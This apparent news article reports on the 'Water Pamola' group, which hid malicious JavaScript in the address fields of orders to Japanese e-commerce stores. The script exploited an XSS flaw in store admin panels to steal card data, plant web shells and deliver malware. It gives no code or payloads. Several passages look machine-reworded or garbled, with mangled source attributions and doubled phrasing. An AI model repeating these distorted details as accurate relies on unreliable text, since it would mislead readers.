XSS in the Wild: JavaScript-stuffed Commands Used to Compromise Japanese Ecommerce Sites


John Leyden May 04, 2021 at 14:20 UTC

Updated: May 18, 2021 at 12:55 UTC

Website vulnerabilities abused in new hacking campaign

An established organized crime group has changed tack by launching attacks on e-commerce stores that exploit cross-site scripting (XSS) exploits instead of traditional phishing lures.

The group, nicknamed “Water Pamola” by Trend Micro, has been attacking e-commerce stores in Japan, Australia and European countries for two years using spam emails containing malicious attachments.

Since last year, however, the group has changed their focus and reduced their focus by attacking Japanese stores with orders maliciously crafted with hostile JavaScript code.

This malicious code is inserted into the field where the customer’s address or company name normally resides.

Keep up to date with the latest e-commerce security news

The rogue script is likely activated by exploiting an XSS vulnerability in the administration portal of a targeted store, according to Trend Micro.

“Malicious behavior performed by scripts includes page grabbing, credential phishing, web shell infection, and malware delivery,” says infosec in a report. blog post on the current campaign.

Data breach related to Water Pamola

In at least one instance, the administrators of a website victim of Water Pamola subsequently revealed that they had suffered a data breach.

Their server was illegally accessed and personal information including names, credit card numbers, card expiration dates, and credit card security codes potentially leaked.

This indicates a Magecart type attack with the twist that cybercriminals are not looking for a specific ecommerce framework, but ecommerce systems in general.

PREVIEW Magecart attacks: the cat and mouse game continues in 2021

“If the store’s e-commerce system is vulnerable to XSS attacks, the malicious script will be loaded and executed on the merchant’s management panel once someone (such as a system administrator or store employee) opens the [malicious] order, ”concludes Trend Micro.


The attack scripts were handled with an XSS attack framework called ‘XSS.ME‘, which cybercriminals have developed and customized to go beyond out-of-the-box capabilities to steal location and browser cookies.

The source code for this framework is shared on many Chinese public forums, according to Trend Micro.

The same attackers also use a secondary attack line that relies on social engineering to phish credentials or trick recipients into downloading malware under the guise of an Adobe Flash update.

There are several groups of Magecart attackers. They usually embed a skimmer in e-commerce web pages (through exploitation of a vulnerability, accessing the victim’s network, compromising third-party libraries, etc.).

Each time data is entered into a form, the skimmer sends a copy of the data to a command and control server.

In short, Magecart-type attacks target website visitors, while Water Pamola targets website administrators, Trend Micro’s Jaromir Horejsi said. The daily sip.

“The attacker discovered [an] XSS vulnerability in [the EC-CUBE] framework, which is popular in Japan, so Japanese sites are targeted, ”Horejsi explains. “We can only speculate as to why they target websites created with [a] popular setting in Japan in the first place.

“Although the number of targeted e-commerce stores is not high, we must remember that each online store can have many customers,” the researcher concluded.

READ MORE PHP package manager flaw left millions of web apps exposed to abuse

Leave A Reply

Your email address will not be published.